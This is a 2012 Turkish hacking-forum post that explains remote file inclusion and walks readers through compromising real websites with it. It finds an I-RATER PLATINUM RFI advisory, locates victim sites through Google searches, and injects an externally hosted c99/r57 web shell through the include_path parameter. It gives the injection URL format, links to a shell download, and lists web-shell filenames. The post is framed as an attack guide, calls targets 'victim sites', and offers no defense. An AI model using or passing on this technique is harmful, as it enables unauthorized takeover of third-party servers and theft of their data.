Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.





Shell Hakkında Bilgi | File İclude Nedir ? Nasıl Uygulanır |

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 03-07-2012 18:48   #1
  • Asteğmen
  • Üye Bilgileri
Üyelik tarihi
07/2012
Nereden
Antalya
Mesajlar
Konular

Teşekkür (Etti): 0
Teşekkür (Aldı): 20


Shell Hakkında Bilgi | File İclude Nedir ? Nasıl Uygulanır |



File Include Nedir?_ Amacı Nedir?

File ın Türkçe karşılıgı ''Dosya'' Include un Türkçe karşılığı ise ''içine almak* içermek'' tır.Sımdı bu ıkı sozcugu bırlestırgıınızde File Include dosya içine almak eklemek manasına gelmektedır.Pekı terımı anladıysak ne işe yaramaktadır ;

File include bızım ısmınden anladıgımız üzere sistemlere dosya ekleme yada dosya cağırma manasına gelmektedır.Ama burada en onemli olan cagıracagımız dosyanın turu özellikle illegaliate merak saran kışıler için bu dosya turleri cok onemlidir.Ornegın saldırgan birey cagıracagı bir shell dosyasıyla servera erisebilir ve serverin içindeki tüm bilgileri alıp serverdaki sistemleri hackleyebilir.Bu tıp bir saldırı server sahibi için zarar demetir bunun yanında saldırıya yapan kişi içinse muthiş bir nam ve deneyım olacaktır.

File Include server sahıblerı için tam manasıyla bas belası hackerlar için sedünyadakı en kaliteli yöntemlerden biridir...Kısaca sadece site hacklemekle ilgilenenler içinse hackın vazgecılmesı durumundadır....

File Include Nasıl Uygulanır ?

File Include uygulnaamsını anlatmak için once bir takım terımleri tanımanız gerekmektedir ;

R57shell: Su andadunyadaki en kaliteli shelldir.Shell nedir shell kısaca linux kabugudur.İllegaliate merak saranlar içinse internetin ta kendısıdır.

C99shell: R57Shell in birazcık daha eskı ve daha kullanıssız versiyonudur.

TurkwORM.cOM

File include uygulamasının uygulanmasına gecelim...

Şimdi sizlere file includelardan nasıl yararlanacagınız ve file include terımınden bahsedecem....
Simdi arkadaslar guncel vulnerabilities larin(Acıklarin) en cok yayınlandıgı sistemleri size vereyım ilk olarak ..
www.milw0rm.com ( web apps)
TurkWorm.Com - Turkish Technology Center Hack & Security Portal
Exploit Database - Site 1
...

Genel olarak en genıs arşivmilw0rmda bulunmaktadır.Şimdi uygulamalı olarak bir siteye saldıralım ki olayı iyice anlayın.İlk olarak vulnerabilities imizi bulalım...

milw0rm.com webapps I-RATER PLATINUM Remote File Inclusion Vulnerabilities

Sistemimiz bu oLsun ve sız bu dosyaya tıkladıgınızda I-RATER PLATINUM sistemde olan file include vulnerabilty ne ulasabileceksiniz.Ve acılan sayfaya baktıgınızda

http://www.xxx.com/admin/config_sett...?include_path=[Shell]
seklinde bir seyle karsılacaksınız.Peki bu ne anlama gelmektedir onuda açıklayım...

xxx.com Bizim saldıracagımız site (Yani Kurban Site Veya Server)

Eger site sahıbı kullandıgı scriptin dosyalarını atarken bir dosya içinde attıysa o
http://www.xxx.com/patch/admin/confi...?include_path=[Shell] şeklinde olacaktır

TurkWorm.Com - Turkish Technology Center Hack & Security Portal


config_settings.tpl.php?include_path=[Shell]-Buda file includemuzu oldugu bölümdür ki bu devamli değısıklık gosterir ben genel olarak yazıyorum bu su şekildede olabilir o siteye göre değişir.

Bunu nasıl yapacagız ılk milw0rm dan buldugumuz dosyanın adı I-RATER PLATINUM Remote File Inclusion Vulnerabilities peki bu ne anlama geliyo I-RATER PLATINUM olan sistemlerde dosya sokma acıgının bulundugu manasına gelir bizde google.com'da I-RATER PLATINUM seklinde aratırsak yada sistemden yapılmıs herhangı bır sıteye ulasıp altındakı copyrigt yazısını google yazarsanız daha cok site bulabilirsiniz...

Simdi gelelim file includeumuzu uygulamaya etkilenen sistemi ve nasıl buldugumuzu öğrendığımıze gore gerıye sadece pratık kalıyor.

shelli herhangi biryere upload ediyoruz linkimiz www.turkworm.com/yourshell.txt olsun ve işime devam ediyorum simdi google aramasına geri donelim... aradıgımız sitelerde simdi seriden tek tek deneme yapıyoruz taki file include u yedirecegimiz bir site bulana kadar ....

Yedirme seklimiz su sekilde olacak...

http://www.xxx.com/admin/config_sett...yourshell.txt?

Dikkat edilmesi gereken iki husus var shell linkinizi yazarken = sonrası içinn http:// başa mutlaka konulmalı ve sona da ''?'' bu konulmalı mutlaka aksi taktırde yaptıgımız uygulmanın manası olmucaktır cunku calısmayacaktır...

Eğer yerse kullandıgınız shell e gore asagıda ki gibi bir resım cıkacaktır.Dosyalar sıralanmıs yanında permlerin oldugu.
Perm = İzin

C99 ==>ImageShack® - Online Photo and Video Hosting

R57 ==> ImageShack® - Online Photo and Video Hosting

Yeşil Renkli olanlarda değişiklik yapabilirsiniz

Ve shelli siteye soktuk artık bır nevı server sızın gerisi size kalmış...

Shell Link (C99)

http://bit.ly/dT82MH

Link Değiştirilmiştir.Edit By TheMajestic.

\\ By_Cellat_Hernan //


-------------------------------

c99.shell.php[/font]
hbtcasus.php
phpRemotevieW.php
PHPShellbyMacker.php
r57shell-1.3.php
r57shell-v1.24.php
c99shellbeta.php
kobra.php
phpshell.php
PHVayv.php
r57shell-v1.0.php
r57.php
cmd.asp
CyperSpy5.asp
klasvayv.asp
CyberEye.asp
EFSo2.asp
Zehir4.asp

DOWNLOAD

Verdiğim Sitelerdeki Açıklar Kapanmış Olabilir Bu Yüzden Başka Sitelerde Deneyin Veya Güncel Başka Açıklar Arayın

NOT : BAZI ARKADAŞLAR HALA ANLAMAMAKTA DİRENİYOR SHELL BİRNEVİ BACKDOORDUR BU YÜZDEN VİRÜS PROGRMLARI VİRÜS OLARAK GÖRÜR

ALINTIDIR FAKAT EMEKTİR...
 Offline  
 
Alıntı ile Cevapla
Teşekkür

BlackBlade Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau